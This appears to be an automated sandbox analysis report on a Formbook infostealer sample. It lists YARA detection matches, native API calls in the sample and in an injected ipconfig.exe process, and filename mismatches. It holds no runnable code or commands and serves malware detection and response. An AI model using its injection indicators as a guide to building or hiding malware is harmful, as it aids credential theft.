Source: 00000005.00000002.295482175.0000000001880000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.252705073.0000000004631000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.252705073.0000000004631000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.495362707.0000000000B90000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.495362707.0000000000B90000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.492372341.00000000003B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.492372341.00000000003B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.495228855.0000000000B50000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.495228855.0000000000B50000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.295106715.0000000001520000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.295106715.0000000001520000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.294777794.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.294777794.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.08917506_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.08917506_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.08917506_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.08917506_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_058A4DE2 NtQuerySystemInformation, 0_2_058A4DE2
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_058A4DA8 NtQuerySystemInformation, 0_2_058A4DA8
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_004181B0 NtCreateFile, 5_2_004181B0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_00418260 NtReadFile, 5_2_00418260
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_004182E0 NtClose, 5_2_004182E0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_00418390 NtAllocateVirtualMemory, 5_2_00418390
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_004181AA NtCreateFile, 5_2_004181AA
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0041825A NtReadFile, 5_2_0041825A
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_015B9910
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B99A0 NtCreateSection,LdrInitializeThunk, 5_2_015B99A0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9840 NtDelayExecution,LdrInitializeThunk, 5_2_015B9840
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9860 NtQuerySystemInformation,LdrInitializeThunk, 5_2_015B9860
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B98F0 NtReadVirtualMemory,LdrInitializeThunk, 5_2_015B98F0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9A50 NtCreateFile,LdrInitializeThunk, 5_2_015B9A50
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9A00 NtProtectVirtualMemory,LdrInitializeThunk, 5_2_015B9A00
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9A20 NtResumeThread,LdrInitializeThunk, 5_2_015B9A20
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9540 NtReadFile,LdrInitializeThunk, 5_2_015B9540
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B95D0 NtClose,LdrInitializeThunk, 5_2_015B95D0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9710 NtQueryInformationToken,LdrInitializeThunk, 5_2_015B9710
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9FE0 NtCreateMutant,LdrInitializeThunk, 5_2_015B9FE0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9780 NtMapViewOfSection,LdrInitializeThunk, 5_2_015B9780
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B97A0 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_015B97A0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9660 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_015B9660
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B96E0 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_015B96E0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9950 NtQueueApcThread, 5_2_015B9950
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B99D0 NtCreateProcessEx, 5_2_015B99D0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015BB040 NtSuspendThread, 5_2_015BB040
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9820 NtEnumerateKey, 5_2_015B9820
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B98A0 NtWriteVirtualMemory, 5_2_015B98A0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9B00 NtSetValueKey, 5_2_015B9B00
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015BA3B0 NtGetContextThread, 5_2_015BA3B0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9A10 NtQuerySection, 5_2_015B9A10
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9A80 NtOpenDirectoryObject, 5_2_015B9A80
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9560 NtWriteFile, 5_2_015B9560
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015BAD30 NtSetContextThread, 5_2_015BAD30
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9520 NtWaitForSingleObject, 5_2_015B9520
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B95F0 NtQueryInformationFile, 5_2_015B95F0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015BA770 NtOpenThread, 5_2_015BA770
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9770 NtSetInformationFile, 5_2_015B9770
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9760 NtOpenProcess, 5_2_015B9760
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015BA710 NtOpenProcessToken, 5_2_015BA710
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9730 NtQueryVirtualMemory, 5_2_015B9730
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9650 NtQueryValueKey, 5_2_015B9650
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9670 NtQueryInformationProcess, 5_2_015B9670
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B9610 NtEnumerateValueKey, 5_2_015B9610
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B96D0 NtCreateKey, 5_2_015B96D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99840 NtDelayExecution,LdrInitializeThunk, 15_2_00D99840
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99860 NtQuerySystemInformation,LdrInitializeThunk, 15_2_00D99860
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D999A0 NtCreateSection,LdrInitializeThunk, 15_2_00D999A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99910 NtAdjustPrivilegesToken,LdrInitializeThunk, 15_2_00D99910
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99A50 NtCreateFile,LdrInitializeThunk, 15_2_00D99A50
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D995D0 NtClose,LdrInitializeThunk, 15_2_00D995D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99540 NtReadFile,LdrInitializeThunk, 15_2_00D99540
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D996D0 NtCreateKey,LdrInitializeThunk, 15_2_00D996D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D996E0 NtFreeVirtualMemory,LdrInitializeThunk, 15_2_00D996E0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99FE0 NtCreateMutant,LdrInitializeThunk, 15_2_00D99FE0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99780 NtMapViewOfSection,LdrInitializeThunk, 15_2_00D99780
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99710 NtQueryInformationToken,LdrInitializeThunk, 15_2_00D99710
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D998F0 NtReadVirtualMemory, 15_2_00D998F0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D998A0 NtWriteVirtualMemory, 15_2_00D998A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D9B040 NtSuspendThread, 15_2_00D9B040
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99820 NtEnumerateKey, 15_2_00D99820
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D999D0 NtCreateProcessEx, 15_2_00D999D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99950 NtQueueApcThread, 15_2_00D99950
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99A80 NtOpenDirectoryObject, 15_2_00D99A80
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99A10 NtQuerySection, 15_2_00D99A10
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99A00 NtProtectVirtualMemory, 15_2_00D99A00
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99A20 NtResumeThread, 15_2_00D99A20
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D9A3B0 NtGetContextThread, 15_2_00D9A3B0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99B00 NtSetValueKey, 15_2_00D99B00
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D995F0 NtQueryInformationFile, 15_2_00D995F0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99560 NtWriteFile, 15_2_00D99560
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D9AD30 NtSetContextThread, 15_2_00D9AD30
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99520 NtWaitForSingleObject, 15_2_00D99520
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99650 NtQueryValueKey, 15_2_00D99650
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99670 NtQueryInformationProcess, 15_2_00D99670
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99660 NtAllocateVirtualMemory, 15_2_00D99660
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99610 NtEnumerateValueKey, 15_2_00D99610
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D997A0 NtUnmapViewOfSection, 15_2_00D997A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D9A770 NtOpenThread, 15_2_00D9A770
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99770 NtSetInformationFile, 15_2_00D99770
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99760 NtOpenProcess, 15_2_00D99760
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D9A710 NtOpenProcessToken, 15_2_00D9A710
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D99730 NtQueryVirtualMemory, 15_2_00D99730
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003C81B0 NtCreateFile, 15_2_003C81B0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003C8260 NtReadFile, 15_2_003C8260
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003C82E0 NtClose, 15_2_003C82E0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003C81AA NtCreateFile, 15_2_003C81AA
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003C825A NtReadFile, 15_2_003C825A
Detected potential crypto function
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_030F1D47 0_2_030F1D47
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_030F176C 0_2_030F176C
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_03118B13 0_2_03118B13
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_03117D14 0_2_03117D14
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_0581DD70 0_2_0581DD70
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_05810BF0 0_2_05810BF0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_05810BDF 0_2_05810BDF
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_09571C70 0_2_09571C70
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_0957CC88 0_2_0957CC88
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_09571360 0_2_09571360
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_09572BE8 0_2_09572BE8
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_00FC9829 0_2_00FC9829
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0041B825 5_2_0041B825
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_00401030 5_2_00401030
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0041C19E 5_2_0041C19E
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0041CAC5 5_2_0041CAC5
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_00408C50 5_2_00408C50
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0041C4E5 5_2_0041C4E5
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_00402D90 5_2_00402D90
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0041C742 5_2_0041C742
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_00402FB0 5_2_00402FB0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0157F900 5_2_0157F900
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01594120 5_2_01594120
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0164E824 5_2_0164E824
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01631002 5_2_01631002
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_016428EC 5_2_016428EC
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0158B090 5_2_0158B090
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_016420A8 5_2_016420A8
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015A20A0 5_2_015A20A0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0159AB40 5_2_0159AB40
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01642B28 5_2_01642B28
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0163DBD2 5_2_0163DBD2
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_016303DA 5_2_016303DA
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015AEBB0 5_2_015AEBB0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0162FA2B 5_2_0162FA2B
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_016422AE 5_2_016422AE
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01641D55 5_2_01641D55
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01642D07 5_2_01642D07
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01570D20 5_2_01570D20
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0158D5E0 5_2_0158D5E0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_016425DD 5_2_016425DD
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015A2581 5_2_015A2581
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0163D466 5_2_0163D466
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0158841F 5_2_0158841F
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01641FF1 5_2_01641FF1
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0164DFCE 5_2_0164DFCE
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01596E30 5_2_01596E30
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0163D616 5_2_0163D616
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01642EF7 5_2_01642EF7
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E228EC 15_2_00E228EC
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D6B090 15_2_00D6B090
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E220A8 15_2_00E220A8
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D820A0 15_2_00D820A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E11002 15_2_00E11002
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D5F900 15_2_00D5F900
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D74120 15_2_00D74120
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E222AE 15_2_00E222AE
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E1DBD2 15_2_00E1DBD2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D8EBB0 15_2_00D8EBB0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E22B28 15_2_00E22B28
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E1D466 15_2_00E1D466
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D6841F 15_2_00D6841F
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D6D5E0 15_2_00D6D5E0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E225DD 15_2_00E225DD
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D82581 15_2_00D82581
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E21D55 15_2_00E21D55
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E22D07 15_2_00E22D07
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D50D20 15_2_00D50D20
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E22EF7 15_2_00E22EF7
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D76E30 15_2_00D76E30
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E1D616 15_2_00E1D616
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E21FF1 15_2_00E21FF1
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003CCAC5 15_2_003CCAC5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003B8C50 15_2_003B8C50
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003CC4E5 15_2_003CC4E5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003B2D90 15_2_003B2D90
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003CC742 15_2_003CC742
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003B2FB0 15_2_003B2FB0
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: String function: 0157B150 appears 48 times
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: String function: 00D5B150 appears 35 times
Sample file is different than original file name gathered from version info
Source: 08917506_by_Libranalysis.exe Binary or memory string: OriginalFilename vs 08917506_by_Libranalysis.exe
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.261415495.00000000094D0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameDSASignature.dll@ vs 08917506_by_Libranalysis.exe
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.257338914.00000000076E0000.00000002.00000001.sdmp Binary or memory string: originalfilename vs 08917506_by_Libranalysis.exe
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.257338914.00000000076E0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 08917506_by_Libranalysis.exe
Source: 08917506_by_Libranalysis.exe, 00000000.00000000.227243971.0000000000FC2000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameNotFiniteNumberException.exeB vs 08917506_by_Libranalysis.exe
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252059704.0000000003631000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameSimpleUI.dll( vs 08917506_by_Libranalysis.exe
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.258531380.0000000008BE0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameIEFRAME.DLLD vs 08917506_by_Libranalysis.exe
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.260684849.0000000009280000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs 08917506_by_Libranalysis.exe
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.258654930.0000000008C00000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs 08917506_by_Libranalysis.exe
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.256930094.00000000075F0000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs 08917506_by_Libranalysis.exe
Source: 08917506_by_Libranalysis.exe Binary or memory string: OriginalFilename vs 08917506_by_Libranalysis.exe
Source: 08917506_by_Libranalysis.exe, 00000005.00000002.294838186.0000000000B22000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameNotFiniteNumberException.exeB vs 08917506_by_Libranalysis.exe
Source: 08917506_by_Libranalysis.exe, 00000005.00000002.295432403.00000000017FF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 08917506_by_Libranalysis.exe
Source: 08917506_by_Libranalysis.exe, 00000005.00000002.295601970.0000000003157000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameipconfig.exej% vs 08917506_by_Libranalysis.exe
Source: 08917506_by_Libranalysis.exe Binary or memory string: OriginalFilenameNotFiniteNumberException.exeB vs 08917506_by_Libranalysis.exe
Uses 32bit PE files
Source: 08917506_by_Libranalysis.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 00000005.00000002.295482175.0000000001880000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.295482175.0000000001880000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.252705073.0000000004631000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.252705073.0000000004631000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.495362707.0000000000B90000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.495362707.0000000000B90000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.492372341.00000000003B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.492372341.00000000003B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.495228855.0000000000B50000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.495228855.0000000000B50000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
